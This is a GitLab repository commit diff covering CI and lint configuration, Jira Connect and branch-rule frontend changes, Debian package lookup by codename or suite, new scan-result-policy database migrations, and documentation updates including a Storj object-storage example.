Add latest changes from gitlab-org/gitlab@master

GitLab Bot 2023-01-31 15:10:47 +00:00
parent c62dd5ae44
commit 6f18a8d0b0
96 changed files with 966 additions and 973 deletions

View File

@@ -42,7 +42,7 @@ review-docs-cleanup:
docs-lint links:
extends:
- .docs:rules:docs-lint
image: ${REGISTRY_HOST}/${REGISTRY_GROUP}/gitlab-docs/lint-html:alpine-3.16-ruby-2.7.7-8ae1f7da
image: ${REGISTRY_HOST}/${REGISTRY_GROUP}/gitlab-docs/lint-html:alpine-3.16-ruby-3.0.5-869cfc5d
stage: lint
needs: []
script:

View File

@@ -19,7 +19,6 @@ include:
.base-before_script: &base-before_script
- source ./scripts/utils.sh
- source ./scripts/review_apps/review-apps.sh
- apt-get update && apt-get install -y jq
dont-interrupt-me:
extends: .rules:dont-interrupt

View File

@@ -4289,7 +4289,6 @@ Layout/LineLength:
- 'spec/lib/gitlab/ci/status/build/manual_spec.rb'
- 'spec/lib/gitlab/ci/status/build/waiting_for_approval_spec.rb'
- 'spec/lib/gitlab/ci/status/stage/play_manual_spec.rb'
- 'spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/deploy_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/auto_devops_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/variables/builder_spec.rb'

View File

@@ -136,7 +136,6 @@ Layout/SpaceInsideParens:
- 'spec/lib/gitlab/ci/pipeline/seed/build_spec.rb'
- 'spec/lib/gitlab/ci/reports/security/vulnerability_reports_comparer_spec.rb'
- 'spec/lib/gitlab/ci/reports/test_suite_spec.rb'
- 'spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/AWS/deploy_ecs_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/MATLAB_spec.rb'
- 'spec/lib/gitlab/ci/templates/Terraform/base_gitlab_ci_yaml_spec.rb'

View File

@@ -1771,7 +1771,6 @@ RSpec/ContextWording:
- 'spec/lib/gitlab/ci/status/build/failed_spec.rb'
- 'spec/lib/gitlab/ci/status/composite_spec.rb'
- 'spec/lib/gitlab/ci/status/factory_spec.rb'
- 'spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/code_quality_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/sast_iac_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/sast_iac_latest_gitlab_ci_yaml_spec.rb'

View File

@@ -4662,7 +4662,6 @@ RSpec/MissingFeatureCategory:
- 'spec/lib/gitlab/ci/status/success_warning_spec.rb'
- 'spec/lib/gitlab/ci/status/waiting_for_resource_spec.rb'
- 'spec/lib/gitlab/ci/tags/bulk_insert_spec.rb'
- 'spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/AWS/deploy_ecs_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/build_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/deploy_gitlab_ci_yaml_spec.rb'

View File

@@ -748,7 +748,6 @@ Style/PercentLiteralDelimiters:
- 'spec/lib/gitlab/ci/reports/test_suite_spec.rb'
- 'spec/lib/gitlab/ci/status/composite_spec.rb'
- 'spec/lib/gitlab/ci/status/stage/factory_spec.rb'
- 'spec/lib/gitlab/ci/templates/5_minute_production_app_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/deploy_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/Jobs/sast_iac_latest_gitlab_ci_yaml_spec.rb'
- 'spec/lib/gitlab/ci/templates/auto_devops_gitlab_ci_yaml_spec.rb'

View File

@@ -1,10 +1,19 @@
import { setAttributes } from '~/lib/utils/dom_utils';
import axios from '~/lib/utils/axios_utils';
import { getBaseURL, relativePathToAbsolute, joinPaths } from '~/lib/utils/url_utility';
const SANDBOX_FRAME_PATH = '/-/sandbox/swagger';
const getSandboxFrameSrc = () => {
const path = joinPaths(gon.relative_url_root || '', SANDBOX_FRAME_PATH);
return relativePathToAbsolute(path, getBaseURL());
};
const createSandbox = () => {
const iframeEl = document.createElement('iframe');
setAttributes(iframeEl, {
src: '/-/sandbox/swagger',
src: getSandboxFrameSrc(),
sandbox: 'allow-scripts allow-popups allow-forms',
frameBorder: 0,
width: '100%',

View File

@@ -31,6 +31,9 @@ export default {
subscriptionsPath: {
default: '',
},
publicKeyStorageEnabled: {
default: false,
},
},
computed: {
...mapState(['currentUser']),
@@ -144,6 +147,7 @@ export default {
<sign-in-page
v-show="!userSignedIn"
:has-subscriptions="hasSubscriptions"
:public-key-storage-enabled="publicKeyStorageEnabled"
@sign-in-oauth="onSignInOauth"
@error="onSignInError"
/>

View File

@@ -27,6 +27,7 @@ export function initJiraConnect() {
usersPath,
gitlabUserPath,
oauthMetadata,
publicKeyStorageEnabled,
} = el.dataset;
sizeToParent();
@@ -42,6 +43,7 @@ export function initJiraConnect() {
usersPath,
gitlabUserPath,
oauthMetadata: oauthMetadata ? JSON.parse(oauthMetadata) : null,
publicKeyStorageEnabled,
},
render(createElement) {
return createElement(JiraConnectApp);

View File

@@ -12,10 +12,14 @@ export default {
type: Boolean,
required: true,
},
publicKeyStorageEnabled: {
type: Boolean,
required: true,
},
},
computed: {
isOauthSelfManagedEnabled() {
return this.glFeatures.jiraConnectOauth;
return this.glFeatures.jiraConnectOauth && this.publicKeyStorageEnabled;
},
},
};

View File

@@ -3,7 +3,7 @@ import { GlSprintf, GlLink, GlLoadingIcon } from '@gitlab/ui';
import { sprintf, n__ } from '~/locale';
import { getParameterByName, mergeUrlParams } from '~/lib/utils/url_utility';
import { helpPagePath } from '~/helpers/help_page_helper';
import branchRulesQuery from '../../queries/branch_rules_details.query.graphql';
import branchRulesQuery from 'ee_else_ce/projects/settings/branch_rules/queries/branch_rules_details.query.graphql';
import { getAccessLevels } from '../../../utils';
import Protection from './protection.vue';
import {
@@ -12,22 +12,16 @@ import {
BRANCH_PARAM_NAME,
WILDCARDS_HELP_PATH,
PROTECTED_BRANCHES_HELP_PATH,
APPROVALS_HELP_PATH,
STATUS_CHECKS_HELP_PATH,
} from './constants';
const wildcardsHelpDocLink = helpPagePath(WILDCARDS_HELP_PATH);
const protectedBranchesHelpDocLink = helpPagePath(PROTECTED_BRANCHES_HELP_PATH);
const approvalsHelpDocLink = helpPagePath(APPROVALS_HELP_PATH);
const statusChecksHelpDocLink = helpPagePath(STATUS_CHECKS_HELP_PATH);
export default {
name: 'RuleView',
i18n: I18N,
wildcardsHelpDocLink,
protectedBranchesHelpDocLink,
approvalsHelpDocLink,
statusChecksHelpDocLink,
components: { Protection, GlSprintf, GlLink, GlLoadingIcon },
inject: {
projectPath: {
@@ -36,12 +30,6 @@ export default {
protectedBranchesPath: {
default: '',
},
approvalRulesPath: {
default: '',
},
statusChecksPath: {
default: '',
},
branchesPath: {
default: '',
},
@@ -58,7 +46,7 @@
const branchRule = branchRules.nodes.find((rule) => rule.name === this.branch);
this.branchRule = branchRule;
this.branchProtection = branchRule?.branchProtection;
this.approvalRules = branchRule?.approvalRules;
this.approvalRules = branchRule?.approvalRules?.nodes || [];
this.statusChecks = branchRule?.externalStatusChecks?.nodes || [];
this.matchingBranchesCount = branchRule?.matchingBranchesCount;
},
@@ -98,20 +86,6 @@ export default {
total: this.pushAccessLevels?.total || 0,
});
},
approvalsHeader() {
const total = this.approvals.reduce(
(sum, { approvalsRequired }) => sum + approvalsRequired,
0,
);
return sprintf(this.$options.i18n.approvalsHeader, {
total,
});
},
statusChecksHeader() {
return sprintf(this.$options.i18n.statusChecksHeader, {
total: this.statusChecks.length,
});
},
allBranches() {
return this.branch === ALL_BRANCHES_WILDCARD;
},
@@ -131,8 +105,13 @@ export default {
const subject = n__('branch', 'branches', total);
return sprintf(this.$options.i18n.matchingBranchesLinkTitle, { total, subject });
},
approvals() {
return this.approvalRules?.nodes || [];
// needed to override EE component
statusChecksHeader() {
return '';
},
// needed to override EE component
approvalsHeader() {
return '';
},
},
methods: {
@@ -199,40 +178,46 @@
:groups="mergeAccessLevels.groups"
/>
<!-- EE start -->
<!-- Approvals -->
<h4 class="gl-mb-1 gl-mt-5">{{ $options.i18n.approvalsTitle }}</h4>
<gl-sprintf :message="$options.i18n.approvalsDescription">
<template #link="{ content }">
<gl-link :href="$options.approvalsHelpDocLink">
{{ content }}
</gl-link>
</template>
</gl-sprintf>
<template v-if="approvalsHeader">
<h4 class="gl-mb-1 gl-mt-5">{{ $options.i18n.approvalsTitle }}</h4>
<gl-sprintf :message="$options.i18n.approvalsDescription">
<template #link="{ content }">
<gl-link :href="$options.approvalsHelpDocLink">
{{ content }}
</gl-link>
</template>
</gl-sprintf>
<protection
class="gl-mt-3"
:header="approvalsHeader"
:header-link-title="$options.i18n.manageApprovalsLinkTitle"
:header-link-href="approvalRulesPath"
:approvals="approvals"
/>
<protection
class="gl-mt-3"
:header="approvalsHeader"
:header-link-title="$options.i18n.manageApprovalsLinkTitle"
:header-link-href="approvalRulesPath"
:approvals="approvalRules"
/>
</template>
<!-- Status checks -->
<h4 class="gl-mb-1 gl-mt-5">{{ $options.i18n.statusChecksTitle }}</h4>
<gl-sprintf :message="$options.i18n.statusChecksDescription">
<template #link="{ content }">
<gl-link :href="$options.statusChecksHelpDocLink">
{{ content }}
</gl-link>
</template>
</gl-sprintf>
<template v-if="statusChecksHeader">
<h4 class="gl-mb-1 gl-mt-5">{{ $options.i18n.statusChecksTitle }}</h4>
<gl-sprintf :message="$options.i18n.statusChecksDescription">
<template #link="{ content }">
<gl-link :href="$options.statusChecksHelpDocLink">
{{ content }}
</gl-link>
</template>
</gl-sprintf>
<protection
class="gl-mt-3"
:header="statusChecksHeader"
:header-link-title="$options.i18n.statusChecksLinkTitle"
:header-link-href="statusChecksPath"
:status-checks="statusChecks"
/>
<protection
class="gl-mt-3"
:header="statusChecksHeader"
:header-link-title="$options.i18n.statusChecksLinkTitle"
:header-link-href="statusChecksPath"
:status-checks="statusChecks"
/>
</template>
<!-- EE end -->
</div>
</template>

View File

@@ -1,7 +1,7 @@
import Vue from 'vue';
import VueApollo from 'vue-apollo';
import createDefaultClient from '~/lib/graphql';
import View from './components/view/index.vue';
import View from 'ee_else_ce/projects/settings/branch_rules/components/view/index.vue';
export default function mountBranchRules(el) {
if (!el) {

View File

@@ -4,24 +4,14 @@ query getBranchRulesDetails($projectPath: ID!) {
branchRules {
nodes {
name
matchingBranchesCount
branchProtection {
allowForcePush
codeOwnerApprovalRequired
mergeAccessLevels {
edges {
node {
accessLevel
accessLevelDescription
group {
id
avatarUrl
}
user {
id
name
avatarUrl
webUrl
}
}
}
}
@@ -30,45 +20,10 @@ query getBranchRulesDetails($projectPath: ID!) {
node {
accessLevel
accessLevelDescription
group {
id
avatarUrl
}
user {
id
name
avatarUrl
webUrl
}
}
}
}
}
approvalRules {
nodes {
id
name
type
approvalsRequired
eligibleApprovers {
nodes {
id
name
username
webUrl
avatarUrl
}
}
}
}
externalStatusChecks {
nodes {
id
name
externalUrl
}
}
matchingBranchesCount
}
}
}

View File

@@ -106,7 +106,7 @@ export default {
},
approvalDetails() {
const approvalDetails = [];
if (this.isWildcard) {
if (this.isWildcard || this.matchingBranchesCount > 1) {
approvalDetails.push(this.matchingBranchesText);
}
if (this.branchProtection?.allowForcePush) {

View File

@@ -9,7 +9,7 @@ export const getAccessLevels = (accessLevels = {}) => {
} else if (node.group) {
accessLevelTypes.groups.push(node);
} else {
accessLevelTypes.roles.push(node);
accessLevelTypes.roles.push({ accessLevelDescription: node.accessLevelDescription });
}
});

View File

@@ -31,6 +31,7 @@ class Projects::CommitController < Projects::ApplicationController
respond_to do |format|
format.html do
@ref = params[:id]
render locals: { pagination_params: params.permit(:page) }
end
format.diff do

View File

@@ -46,7 +46,12 @@ module Resolvers
def nested_preloads
{
widgets: widget_preloads,
user_permissions: { update_work_item: :assignees }
user_permissions: { update_work_item: :assignees },
project: { jira_import_status: { project: :jira_imports } },
author: {
location: { author: :user_detail },
gitpod_enabled: { author: :user_preference }
}
}
end
@@ -57,7 +62,7 @@
parent: :work_item_parent,
children: { work_item_children_by_created_at: [:author, { project: :project_feature }] },
labels: :labels,
milestone: :milestone
milestone: { milestone: [:project, :group] }
}
end
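For context on the structure: each top-level key in these preload maps names a GraphQL field on the work item, and the nested hash maps that field's sub-selections to the ActiveRecord associations to preload when they are selected. A shape-only sketch of the new `author` entry (the query-to-association pairing in the comments is an assumption based on the field names):

```ruby
# Shape of the nested preload map: selecting `author { location }` in a
# query preloads each author's user_detail, and `author { gitpodEnabled }`
# preloads each author's user_preference, avoiding per-row N+1 queries.
{
  author: {
    location: { author: :user_detail },
    gitpod_enabled: { author: :user_preference }
  }
}
```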

View File

@@ -8,6 +8,9 @@ module Types
authorize :read_work_item
field :author, Types::UserType, null: true,
description: 'User that created the work item.',
alpha: { milestone: '15.9' }
field :closed_at, Types::TimeType, null: true,
description: 'Timestamp of when the work item was closed.'
field :confidential, GraphQL::Types::Boolean, null: false,

View File

@@ -11,7 +11,8 @@ module JiraConnectHelper
subscriptions_path: jira_connect_subscriptions_path(format: :json),
users_path: current_user ? nil : jira_connect_users_path, # users_path is used to determine if user is signed in
gitlab_user_path: current_user ? user_path(current_user) : nil,
oauth_metadata: Feature.enabled?(:jira_connect_oauth, current_user) ? jira_connect_oauth_data(installation).to_json : nil
oauth_metadata: Feature.enabled?(:jira_connect_oauth, current_user) ? jira_connect_oauth_data(installation).to_json : nil,
public_key_storage_enabled: Gitlab.config.jira_connect.enable_public_keys_storage
}
end

View File

@@ -10,6 +10,7 @@ class Packages::Debian::GroupDistribution < ApplicationRecord
def packages
Packages::Package
.for_projects(group.all_projects.public_only)
.debian
.with_debian_codename(codename)
end
end

View File

@@ -138,10 +138,12 @@ class Packages::Package < ApplicationRecord
joins(:conan_metadatum).where(packages_conan_metadata: { package_username: package_username })
end
scope :with_debian_codename, -> (codename) do
debian
.joins(:debian_distribution)
.where(Packages::Debian::ProjectDistribution.table_name => { codename: codename })
scope :with_debian_codename, ->(codename) do
joins(:debian_distribution).where(Packages::Debian::ProjectDistribution.table_name => { codename: codename })
end
scope :with_debian_codename_or_suite, ->(codename_or_suite) do
joins(:debian_distribution).where(Packages::Debian::ProjectDistribution.table_name => { codename: codename_or_suite })
.or(where(Packages::Debian::ProjectDistribution.table_name => { suite: codename_or_suite }))
end
scope :preload_debian_file_metadata, -> { preload(package_files: :debian_file_metadatum) }
scope :with_composer_target, -> (target) do
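The practical difference between the two scopes: `with_debian_codename` matches only on the distribution's codename, while `with_debian_codename_or_suite` also matches on its suite through the `.or` branch. A minimal usage sketch, assuming a hypothetical project whose Debian distribution has codename `bookworm` and suite `stable`:

```ruby
# Hypothetical lookups; 'bookworm' and 'stable' are assumed values.
project.packages.debian.with_debian_codename('bookworm')         # matches by codename
project.packages.debian.with_debian_codename('stable')           # empty: 'stable' is the suite
project.packages.debian.with_debian_codename_or_suite('stable')  # matches via the suite branch
```

Note that the `debian` scope is no longer baked into `with_debian_codename`, so callers are expected to chain it explicitly, as the other call sites in this commit do.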

View File

@@ -10,7 +10,7 @@ module Packages
.debian
.with_name(params[:name])
.with_version(params[:version])
.with_debian_codename(params[:distribution_name])
.with_debian_codename_or_suite(params[:distribution_name])
.not_pending_destruction
.first
@@ -26,7 +26,10 @@ module Packages
def distribution
strong_memoize(:distribution) do
Packages::Debian::DistributionsFinder.new(project, codename: params[:distribution_name]).execute.last!
Packages::Debian::DistributionsFinder.new(
project,
codename_or_suite: params[:distribution_name]
).execute.last!
end
end
end

View File

@@ -15,12 +15,12 @@ module Packages
end
def execute
# return if changes file has already been processed
return if package_file.debian_file_metadatum&.changes?
validate!
try_obtain_lease do
# return if changes file has already been processed
break if package_file.debian_file_metadatum&.changes?
validate!
package_file.transaction do
update_files_metadata
update_changes_metadata
@@ -38,6 +38,9 @@ module Packages
raise ArgumentError, 'invalid package file' unless package_file.debian_file_metadatum
raise ArgumentError, 'invalid package file' unless package_file.debian_file_metadatum.unknown?
raise ArgumentError, 'invalid package file' unless metadata[:file_type] == :changes
raise ArgumentError, 'missing Source field' unless metadata.dig(:fields, 'Source').present?
raise ArgumentError, 'missing Version field' unless metadata.dig(:fields, 'Version').present?
raise ArgumentError, 'missing Distribution field' unless metadata.dig(:fields, 'Distribution').present?
end
def update_files_metadata
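The effect of this reordering is that the already-processed check and validation now run while holding the exclusive lease, so two workers handling the same changes file can no longer both pass the check before either takes the lease. A condensed sketch of the resulting `execute` flow (method bodies elided):

```ruby
# Condensed flow after this change; only the ordering matters here.
def execute
  try_obtain_lease do                                      # serialize concurrent workers first
    break if package_file.debian_file_metadatum&.changes?  # re-check under the lease
    validate!                                              # includes the new Source/Version/Distribution checks
    package_file.transaction do
      update_files_metadata
      update_changes_metadata
    end
  end
end
```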

View File

@@ -19,9 +19,9 @@ module Packages
def execute
return if @package_file.package.pending_destruction?
try_obtain_lease do
validate!
validate!
try_obtain_lease do
package.transaction do
rename_package_and_set_version
update_package
@@ -36,6 +36,8 @@ module Packages
private
def validate!
raise ArgumentError, 'missing distribution name' unless @distribution_name.present?
raise ArgumentError, 'missing component name' unless @component_name.present?
raise ArgumentError, 'package file without Debian metadata' unless @package_file.debian_file_metadatum
raise ArgumentError, 'already processed package file' unless @package_file.debian_file_metadatum.unknown?
@@ -55,7 +57,7 @@
.debian
.with_name(package_name)
.with_version(package_version)
.with_debian_codename(@distribution_name)
.with_debian_codename_or_suite(@distribution_name)
.not_pending_destruction
.last
package || temp_package
@@ -113,7 +115,7 @@
def distribution
Packages::Debian::DistributionsFinder.new(
@package_file.package.project,
codename: @distribution_name
codename_or_suite: @distribution_name
).execute.last!
end
strong_memoize_attr :distribution

View File

@@ -0,0 +1,9 @@
---
table_name: scan_result_policies
classes: []
feature_categories:
- security_policy_management
description: 'Stores rules of a Security Orchestration Policy.'
introduced_by_url: https://gitlab.com/gitlab-org/gitlab/-/merge_requests/109624
milestone: '15.9'
gitlab_schema: gitlab_main

View File

@@ -0,0 +1,18 @@
# frozen_string_literal: true
class CreateScanResultPolicies < Gitlab::Database::Migration[2.1]
INDEX_NAME = "index_scan_result_policies_on_policy_configuration_id".freeze
def change
create_table :scan_result_policies do |t|
t.references :security_orchestration_policy_configuration,
null: false,
foreign_key: { on_delete: :cascade },
index: { name: INDEX_NAME }
t.timestamps_with_timezone null: false
t.integer :orchestration_policy_idx, limit: 2, null: false
t.text :license_states, array: true, default: []
end
end
end

View File

@@ -0,0 +1,15 @@
# frozen_string_literal: true
class AddScanResultPolicyIdToSoftwareLicensePolicies < Gitlab::Database::Migration[2.1]
INDEX_NAME = "index_software_license_policies_on_scan_result_policy_id".freeze
def change
# rubocop:disable Migration/AddReference
add_reference :software_license_policies,
:scan_result_policy,
foreign_key: { on_delete: :cascade },
index: { name: INDEX_NAME },
null: true
# rubocop:enable Migration/AddReference
end
end
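Both migrations declare `on_delete: :cascade`, which surfaces later in this commit's `structure.sql` as the `fk_rails_de9e5d2ce6` and `fk_rails_e5b77d620e` constraints. A hypothetical console sketch of the resulting chain (the model name is an assumption; the cascades themselves are enforced by the database):

```ruby
# Deleting a policy configuration row removes its scan_result_policies
# rows, which in turn removes the software_license_policies rows that
# reference them, all at the database level; no callbacks required.
configuration = Security::OrchestrationPolicyConfiguration.last
configuration.delete # cascades through both new foreign keys
```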

View File

@@ -0,0 +1 @@
d526d2549357ca87fb4abf400d6128cc14d01ea633cf2d496c3a9111e412c7f2

View File

@@ -0,0 +1 @@
7ad649155804a011c43e4208eea1f59c3e6894591587b5cf9ba4e8be4f5fa757

View File

@@ -21580,6 +21580,24 @@ CREATE SEQUENCE sbom_vulnerable_component_versions_id_seq
ALTER SEQUENCE sbom_vulnerable_component_versions_id_seq OWNED BY sbom_vulnerable_component_versions.id;
CREATE TABLE scan_result_policies (
id bigint NOT NULL,
security_orchestration_policy_configuration_id bigint NOT NULL,
created_at timestamp with time zone NOT NULL,
updated_at timestamp with time zone NOT NULL,
orchestration_policy_idx smallint NOT NULL,
license_states text[] DEFAULT '{}'::text[]
);
CREATE SEQUENCE scan_result_policies_id_seq
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE scan_result_policies_id_seq OWNED BY scan_result_policies.id;
CREATE TABLE schema_migrations (
version character varying NOT NULL,
finished_at timestamp with time zone DEFAULT now()
@@ -22011,7 +22029,8 @@ CREATE TABLE software_license_policies (
software_license_id integer NOT NULL,
classification integer DEFAULT 0 NOT NULL,
created_at timestamp with time zone NOT NULL,
updated_at timestamp with time zone NOT NULL
updated_at timestamp with time zone NOT NULL,
scan_result_policy_id bigint
);
CREATE SEQUENCE software_license_policies_id_seq
@@ -24796,6 +24815,8 @@ ALTER TABLE ONLY sbom_sources ALTER COLUMN id SET DEFAULT nextval('sbom_sources_
ALTER TABLE ONLY sbom_vulnerable_component_versions ALTER COLUMN id SET DEFAULT nextval('sbom_vulnerable_component_versions_id_seq'::regclass);
ALTER TABLE ONLY scan_result_policies ALTER COLUMN id SET DEFAULT nextval('scan_result_policies_id_seq'::regclass);
ALTER TABLE ONLY scim_identities ALTER COLUMN id SET DEFAULT nextval('scim_identities_id_seq'::regclass);
ALTER TABLE ONLY scim_oauth_access_tokens ALTER COLUMN id SET DEFAULT nextval('scim_oauth_access_tokens_id_seq'::regclass);
@@ -27128,6 +27149,9 @@ ALTER TABLE ONLY sbom_sources
ALTER TABLE ONLY sbom_vulnerable_component_versions
ADD CONSTRAINT sbom_vulnerable_component_versions_pkey PRIMARY KEY (id);
ALTER TABLE ONLY scan_result_policies
ADD CONSTRAINT scan_result_policies_pkey PRIMARY KEY (id);
ALTER TABLE ONLY schema_migrations
ADD CONSTRAINT schema_migrations_pkey PRIMARY KEY (version);
@@ -31271,6 +31295,8 @@ CREATE UNIQUE INDEX index_sbom_occurrences_on_uuid ON sbom_occurrences USING btr
CREATE UNIQUE INDEX index_sbom_sources_on_source_type_and_source ON sbom_sources USING btree (source_type, source);
CREATE INDEX index_scan_result_policies_on_policy_configuration_id ON scan_result_policies USING btree (security_orchestration_policy_configuration_id);
CREATE INDEX index_scim_identities_on_group_id ON scim_identities USING btree (group_id);
CREATE UNIQUE INDEX index_scim_identities_on_lower_extern_uid_and_group_id ON scim_identities USING btree (lower((extern_uid)::text), group_id);
@@ -31381,6 +31407,8 @@ CREATE INDEX index_snippets_on_updated_at ON snippets USING btree (updated_at);
CREATE INDEX index_snippets_on_visibility_level_and_secret ON snippets USING btree (visibility_level, secret);
CREATE INDEX index_software_license_policies_on_scan_result_policy_id ON software_license_policies USING btree (scan_result_policy_id);
CREATE INDEX index_software_license_policies_on_software_license_id ON software_license_policies USING btree (software_license_id);
CREATE UNIQUE INDEX index_software_license_policies_unique_per_project ON software_license_policies USING btree (project_id, software_license_id);
@@ -35844,6 +35872,9 @@ ALTER TABLE ONLY incident_management_timeline_event_tags
ALTER TABLE ONLY user_callouts
ADD CONSTRAINT fk_rails_ddfdd80f3d FOREIGN KEY (user_id) REFERENCES users(id) ON DELETE CASCADE;
ALTER TABLE ONLY scan_result_policies
ADD CONSTRAINT fk_rails_de9e5d2ce6 FOREIGN KEY (security_orchestration_policy_configuration_id) REFERENCES security_orchestration_policy_configurations(id) ON DELETE CASCADE;
ALTER TABLE ONLY dast_scanner_profiles_tags
ADD CONSTRAINT fk_rails_deb79b7f19 FOREIGN KEY (dast_scanner_profile_id) REFERENCES dast_scanner_profiles(id) ON DELETE CASCADE;
@@ -35895,6 +35926,9 @@ ALTER TABLE ONLY serverless_domain_cluster
ALTER TABLE ONLY incident_management_escalation_policies
ADD CONSTRAINT fk_rails_e5b513daa7 FOREIGN KEY (project_id) REFERENCES projects(id) ON DELETE CASCADE;
ALTER TABLE ONLY software_license_policies
ADD CONSTRAINT fk_rails_e5b77d620e FOREIGN KEY (scan_result_policy_id) REFERENCES scan_result_policies(id) ON DELETE CASCADE;
ALTER TABLE ONLY vulnerability_external_issue_links
ADD CONSTRAINT fk_rails_e5ba7f7b13 FOREIGN KEY (author_id) REFERENCES users(id) ON DELETE SET NULL;

View File

@@ -586,6 +586,30 @@ If you are using a custom Azure storage domain,
configuration. This information is exchanged in an API call between
GitLab Rails and Workhorse.
#### Storj Gateway Configuration (SJ)
NOTE:
The Storj Gateway [does not support](https://github.com/storj/gateway-st/blob/4b74c3b92c63b5de7409378b0d1ebd029db9337d/docs/s3-compatibility.md) multi-threaded copying (see `UploadPartCopy` in the table).
While an implementation [is planned](https://github.com/storj/roadmap/issues/40), you must [disable multi-threaded copying](#multi-threaded-copying) until it is complete.
The [Storj Network](https://www.storj.io/) provides an S3-compatible API gateway. Use the following configuration example:
```ruby
gitlab_rails['object_store']['connection'] = {
'provider' => 'AWS',
'endpoint' => 'https://gateway.storjshare.io',
'path_style' => true,
'region' => 'eu1',
'aws_access_key_id' => 'ACCESS_KEY',
'aws_secret_access_key' => 'SECRET_KEY',
'aws_signature_version' => 2,
'enable_signature_v4_streaming' => false
}
```
The signature version must be `2`. Using v4 results in an HTTP 411 Length Required error.
For more information, see [issue #4419](https://gitlab.com/gitlab-org/gitlab/-/issues/4419).
### Object-specific configuration
The following YAML shows how the `object_store` section defines

View File

@@ -50,7 +50,9 @@ full list of reference architectures, see
- [Google Cloud Load Balancing](https://cloud.google.com/load-balancing) and [Amazon Elastic Load Balancing](https://aws.amazon.com/elasticloadbalancing/) are known to work.
4. Should be run on reputable Cloud Provider or Self Managed solutions. More information can be found in the [Configure the object storage](#configure-the-object-storage) section.
5. Gitaly Cluster provides the benefits of fault tolerance, but comes with additional complexity of setup and management. Review the existing [technical limitations and considerations before deploying Gitaly Cluster](../gitaly/index.md#before-deploying-gitaly-cluster). If you want sharded Gitaly, use the same specs listed above for `Gitaly`.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to the [Large Repositories](#large-repositories) for more info.
6. Gitaly has been designed and tested with repositories of varying sizes that follow best practices. However, large
repositories or monorepos that don't follow these practices can significantly impact Gitaly requirements. Refer to
[Large repositories](index.md#large-repositories) for more information.
<!-- markdownlint-enable MD029 -->
NOTE:
@@ -144,66 +146,7 @@ monitor .[#7FFFD4,norank]u--> elb
## Requirements
Before starting, you should take note of the following requirements / guidance for this reference architecture.
### Supported CPUs
This reference architecture was built and tested on Google Cloud Platform (GCP) using the
[Intel Xeon E5 v3 (Haswell)](https://cloud.google.com/compute/docs/cpu-platforms)
CPU platform as a baseline ([Sysbench benchmark](https://gitlab.com/gitlab-org/quality/performance/-/wikis/Reference-Architectures/GCP-CPU-Benchmarks)).
Newer, similarly sized CPUs are supported and may have improved performance as a result. For Omnibus environments, ARM-based equivalents are also supported.
NOTE:
Any "burstable" instance types are not recommended due to inconsistent performance.
### Supported infrastructure
As general guidance, GitLab should run on most infrastructure, such as reputable Cloud Providers (AWS, GCP) and their services,
or self-managed solutions (ESXi), that meet both the specs detailed above and any requirements in this section.
However, this does not constitute a guarantee for every potential permutation.
See [Recommended cloud providers and services](index.md#recommended-cloud-providers-and-services) for more information.
### Additional workloads
The Reference Architectures have been [designed and tested](index.md#validation-and-test-results) for standard GitLab setups with
good headroom in mind to cover most scenarios. However, if any additional workloads are being added to the nodes,
such as security software, you may still need to adjust the specs accordingly to compensate.
This also applies to some GitLab features where it's possible to run custom scripts, for example [server hooks](../server_hooks.md).
As a general rule, it's recommended to have robust monitoring in place to measure the impact of
any additional workloads and to inform any changes that need to be made.
### Large repositories
The Reference Architectures were tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos (several gigabytes or more) can **significantly** impact the performance
of Git, and in turn the environment itself, if best practices aren't being followed, such as not storing
binary or blob files in LFS. Repositories are at the core of any environment, and the consequences can be wide-ranging
when they are not optimized. Some examples of this impact include [Git packing operations](https://git-scm.com/book/en/v2/Git-Internals-Packfiles)
taking longer and consuming high CPU and memory resources, or Git checkouts taking longer, which affects both users and
CI pipelines alike.
As such, large repositories come with a notable cost and typically require more resources to handle,
significantly so in some cases. It's therefore **strongly** recommended to review large repositories
to ensure they maintain good health and reduce their size wherever possible.
NOTE:
If best practices aren't followed and large repositories are present in the environment,
increased Gitaly specs may be required to ensure stable performance.
Refer to the [Managing large repositories documentation](../../user/project/repository/managing_large_repositories.md)
for more information and guidance.
### Praefect PostgreSQL
It's worth noting that at this time [Praefect requires its own database server](../gitaly/praefect.md#postgresql) and
that to achieve full High Availability a third-party PostgreSQL database solution will be required.
We hope to offer built-in solutions for these restrictions in the future, but in the meantime a non-HA PostgreSQL server
can be set up via Omnibus GitLab, which the above specs reflect. Refer to the following issues for more information: [`omnibus-gitlab#5919`](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/5919) and [`gitaly#3398`](https://gitlab.com/gitlab-org/gitaly/-/issues/3398).
Before starting, see the [requirements](index.md#requirements) for reference architectures.
## Setup components
@@ -1223,7 +1166,7 @@ NOTE:
Gitaly has been designed and tested with repositories of varying sizes that follow best practices.
However, large repositories or monorepos not following these practices can significantly
impact Gitaly performance and requirements.
Refer to the [Large Repositories](#large-repositories) for more info.
Refer to [Large repositories](index.md#large-repositories) for more information.
The recommended cluster setup includes the following components:
@@ -1533,14 +1476,14 @@ requirements that are dependent on data and load.
NOTE:
Increased specs for Gitaly nodes may be required in some circumstances such as
significantly large repositories or if any [additional workloads](#additional-workloads),
